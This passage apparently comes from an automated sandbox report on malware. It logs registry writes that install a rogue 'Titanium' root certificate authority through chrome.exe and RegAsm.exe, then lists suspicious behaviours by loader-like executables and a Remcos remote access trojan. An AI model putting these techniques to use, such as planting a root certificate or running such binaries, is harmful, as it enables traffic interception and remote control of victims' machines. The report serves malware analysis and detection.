2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b8
96321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079000000140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0200000001000000cc0000001c0000006c000000010000000000000000000000000000000100000043004e003d0054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb99620000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a32
8302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9960200000001000000cc0000001c0000006c000000010000000000000000000000000000000100000043004e003d0054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b8
96321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [duplicate blob elided] C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9965c0000000100000004000000000800000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00420041003600320044003000340044002d0031003100330032002d0034004500320030002d0038003400330034002d003800370046004200340031004600430035003000330032007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b8
96321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [duplicate blob elided] C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [duplicate blob elided] C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [duplicate blob elided] C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [duplicate blob elided] C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00360031003600440043003200320039002d0037003500450035002d0034003100410039002d0039004400330042002d003000460034003600420046003700320032003200310043007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0400000001000000100000002e749b9867a042dda0cb8e3492132d000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b8
96321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [duplicate blob elided] C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [duplicate blob elided] C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00380038003700450038003400360044002d0036004200440039002d0034003100440033002d0038003200390042002d004500420044003000300045003700320035003600420034007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0400000001000000100000002e749b9867a042dda0cb8e3492132d000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b8
96321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00380030004600390044003800310033002d0030004600460036002d0034003000340032002d0039003100360046002d003100390034004300340036003900360043004300420034007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0400000001000000100000002e749b9867a042dda0cb8e3492132d000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b8
96321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [duplicate blob elided] C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = … C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = … C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = … C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = … C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\Remcos\remcos.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
